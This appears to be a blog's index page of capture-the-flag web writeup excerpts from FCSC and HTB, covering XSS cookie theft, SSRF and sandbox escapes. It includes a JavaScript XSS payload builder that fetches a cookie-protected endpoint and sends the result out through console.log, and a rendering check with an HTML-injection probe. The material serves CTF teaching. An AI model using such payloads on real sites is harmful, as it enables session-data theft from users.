10 Fast Fishers [EN]| FCSC 2026

10 Fast Fishers | FCSC 2026 Challenge Think you can type fast? Prove it in 10 Fast Fishers, the addictive underwater typing game where speed meets style! A web typing game with a bot (Firefox 145 / Puppeteer) that visits a user-provided URL after setting a FLAG cookie on the game’s domain (httpOnly: false). The goal is to steal the cookie via XSS. Architecture: App (port 5000), a static Express server hosting the game

Bubulle Corp 1 & 2 [EN]| FCSC 2026

Bubulle Corp 1 & 2 | FCSC 2026 Introduction Bubulle Corp is a two-part web challenge from FCSC 2026. Both parts share the exact same source code: a three-service Docker setup with a Flask frontend, an Apache 2.4.66 reverse proxy, and a Flask/gunicorn 21.2.0 backend. There are two flags hidden in the infra. The first one is kind of a decoy, just a plain flag.txt file sitting on the Apache proxy, served by an AliasMatch rule.

Deep Blue [EN]| FCSC 2026

- 15 mins read
Deep Blue | FCSC 2026 Challenge Discover this new marine life blog! Can you steal the author’s secret fish & chips recipe? Dockerized web app serving an Angular blog about sea creatures. A Puppeteer bot sets an httpOnly FLAG cookie on the app’s domain, then visits a user-supplied URL. Every console.log from the bot’s browser gets forwarded back through the TCP connection. The goal is to trigger XSS in the bot’s browser, use it to fetch the protected secret recipe endpoint (which needs the bot’s cookie), and exfiltrate the flag.
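The excerpt describes the exfiltration channel that these bot challenges rely on: the bot forwards every console.log over the TCP connection, so once script runs in the bot's browser a payload only has to fetch the protected endpoint with the bot's cookie and log the response. The JavaScript below is an added example written for this page, not the writeup's own payload or bot code. The endpoint path /api/recipe, the EXFIL: prefix and the sample console lines are assumptions constructed for illustration.

```javascript
// Build the JavaScript that should run in the bot's browser once XSS is achieved.
// fetch() with credentials: 'include' makes the browser attach the httpOnly FLAG
// cookie, which page script itself cannot read; console.log is the exfil channel
// because the bot forwards console output back over the TCP connection.
// The endpoint path is an assumption, not the challenge's real route.
function buildExfilPayload(endpoint) {
  return [
    `fetch(${JSON.stringify(endpoint)}, { credentials: 'include' })`,
    `  .then(r => r.text())`,
    `  .then(body => console.log('EXFIL:' + body))`,
    `  .catch(e => console.log('EXFIL_ERR:' + e.message));`,
  ].join('\n');
}

// Receiver side: the operator reads the forwarded console lines from the nc
// session and pulls the flag out. FCSC flags use the FCSC{...} format.
const FLAG_RE = /FCSC\{[^}]*\}/;

function extractFlag(forwardedLines) {
  for (const line of forwardedLines) {
    if (!line.startsWith('EXFIL:')) continue;   // ignore the app's own logging
    const m = line.match(FLAG_RE);
    if (m) return m[0];
  }
  return null;
}

// Constructed sample of what the bot might forward (not real challenge output).
const SAMPLE_CONSOLE_LINES = [
  'Angular is running in development mode.',
  'EXFIL:{"recipe":"...","flag":"FCSC{example_placeholder}"}',
];

console.log(buildExfilPayload('/api/recipe'));
console.log('flag:', extractFlag(SAMPLE_CONSOLE_LINES));
```

On the bot side the forwarding is typically a Puppeteer page.on('console', ...) handler writing each message to the socket; the receiver above is what the operator runs on the nc side to pick the flag out of that stream, and the EXFIL: prefix keeps the app's own console noise from being mistaken for the result.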

FCSC Aquarium [EN]| FCSC 2026

- 3 mins read
FCSC Aquarium | FCSC 2026 Challenge The challenge gives us the full source of a Dockerized Node.js web app that serves an animated aquarium page. There is a SUID binary /getflag that reads the flag from /root/flag.txt. The goal is obvious. Looking at the source: two services run inside the container via supervisord. The web app (server.mjs) is started with the Node.js permission model: node --permission --allow-fs-read=/ /usr/app/server.mjs The second one is a messages service (messages.

Secure Mood Notes [EN]| FCSC 2026

Secure Mood Notes | FCSC 2026 Challenge Secure Mood Notes is a secure note-taking application. Each note can be filtered according to your mood: angry, chill, or normal. Share your notes with your friends in complete security! I was given the full source of a Docker application composed of two services: a Symfony 8 PHP app served by Apache with mod_php and the Snuffleupagus security extension, and a Flask microservice handling note sharing.

Shellfish Say [EN]| FCSC 2026

- 4 mins read
Shellfish Say | FCSC 2026 Challenge The new version of Shrimp Say is out! Discover Shellfish Say! To ask the bot to say something, connect with: nc challenges.fcsc.fr 2256 Note: The challenge VM has no internet access. We get the full source of a Docker stack. There is a PHP/Apache web app where a cartoon shellfish “says” a quote loaded via AJAX, and a Puppeteer bot that sets a FLAG cookie on the shellfish-say domain then visits a URL we provide.

Shrimp Saver [EN]| FCSC 2026

- 5 mins read
Shrimp Saver | FCSC 2026 Challenge Nothing beats a little crustacean-based screensaver to brighten up your workstation! I was given the full source of a Docker stack:

- Web app: PHP/Apache serving a bouncing-shrimp screensaver page with a nonce-based CSP.
- Bot: a Puppeteer (headless Chromium 146) service that sets an httpOnly cookie flag_auth on the challenge domain, then visits a user-supplied URL. Every console.

Nextruction [EN]| FCSC 2025

- 10 mins read
Under Nextruction Challenge Writeup

Introduction In this challenge, we are exploring a Next.js web application, with a focus on exploitation using SSRF (Server-Side Request Forgery) and header manipulation. Main Application: https://under-nextruction.fcsc.fr:2213 The application features a separate service that stores a flag, which we need to retrieve:

  services:
    under-nextruction-app:
      build: ./src/nextjs
      ports:
        - "8000:8000"
      environment:
        - FLAG_STORE_KEY=FAKE_KEY
        - JWT_SECRET=FAKE_SECRET
      restart: unless-stopped
    under-nextruction-flag:
      build: ./src/flag-store
      environment:
        - FLAG_STORE_KEY=FAKE_KEY
        - FLAG=FCSC{flag_placeholder}
      restart: unless-stopped

Understanding the Flag Service The flag service, written in Flask, returns a flag when the correct X-Key header is presented at the /get_flag endpoint:

Shrimp-Say [EN]| FCSC 2025

- 3 mins read
Introduction The challenge presents us with a web application called “shrimp-say” and a bot service to interact with: Web application: https://shrimp-say.fcsc.fr/ Bot: nc chall.fcsc.fr 2203 (no internet access) The web application allows users to manipulate two parameters, msg and bg, in its URL: https://shrimp-say.fcsc.fr/?msg=Hello%20Shrimp&bg=lightblue These are reflected on the page:

  <style> body { background-color: lightblue; } ... </style>
  ...
  <div class="speech-bubble">Hello Shrimp</div>

Parameters Analysis msg: This parameter undergoes filtering to prevent the inclusion of the < character, which could be used for HTML content injection.
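The reflection shown above, modeled in JavaScript as an added example (this is not the challenge's PHP source): one render follows the excerpt's description, filtering only the < character out of msg and placing bg verbatim inside the style block; the other escapes msg for HTML text content and accepts bg only if it parses as a plain CSS colour. Whether the raw bg value is exploitable in the real challenge is the writeup's subject; this example only shows the check. The stripping behaviour of the msg filter, the colour allowlist and the probe string are assumptions constructed for illustration.

```javascript
// Render as the excerpt describes: '<' is stripped from msg (assumed behaviour
// of the filter), bg is interpolated untouched into the <style> block.
function renderAsDescribed(msg, bg) {
  const safeMsg = msg.replace(/</g, '');
  return `<style> body { background-color: ${bg}; } </style>` +
         `<div class="speech-bubble">${safeMsg}</div>`;
}

// Hardened render: escape msg for an HTML text context, and validate bg against
// a narrow CSS colour grammar (named colour, #hex, rgb()/hsl() with numeric
// arguments) so that no value can leave the style context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

const CSS_COLOR_RE =
  /^(?:[a-z]{1,20}|#[0-9a-f]{3,8}|(?:rgb|hsl)a?\(\s*[\d.%]+(?:\s*,\s*[\d.%]+){2,3}\s*\))$/i;

function renderHardened(msg, bg) {
  const safeBg = CSS_COLOR_RE.test(bg) ? bg : 'white';   // fall back on a safe default
  return `<style> body { background-color: ${safeBg}; } </style>` +
         `<div class="speech-bubble">${escapeHtml(msg)}</div>`;
}

// Check: how many '<' characters in the output did NOT come from the template?
// The template itself emits exactly four: <style>, </style>, <div>, </div>.
function untrustedTagCount(html) {
  const TEMPLATE_TAGS = 4;
  return (html.match(/</g) || []).length - TEMPLATE_TAGS;
}

// Constructed probe value for bg (not taken from the writeup): it contains tags,
// so any render that passes it through unescaped leaves the style context.
const SAMPLE_BG_PROBE = '</style><b>x</b>';

function probeResults() {
  return {
    asDescribed: untrustedTagCount(renderAsDescribed('Hello Shrimp', SAMPLE_BG_PROBE)),
    hardened: untrustedTagCount(renderHardened('Hello Shrimp', SAMPLE_BG_PROBE)),
  };
}

console.log(probeResults());
```

The point of untrustedTagCount is that it does not care what the injected markup is: any render of untrusted input that produces more < characters than the template itself emitted has let user data change context, which is exactly what the msg filter was meant to prevent and what a filter applied to only one of the two parameters cannot guarantee.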

EncoDecept [EN] | HTB University CTF 2024

- 18 mins read
Introduction This challenge is one of the 4 challenges in the WEB category published at the University CTF 2024. It is rated medium despite having the lowest solve count in the category. It is therefore considered the hardest web challenge of this edition. Description The Frontier Board’s iron grip on the galaxy rests on one secret: the location of the legendary Starry Spur, hidden deep within their Intergalactic Contract System (ICMS). With rebellion brewing, Jack Colt is humanity’s last hope.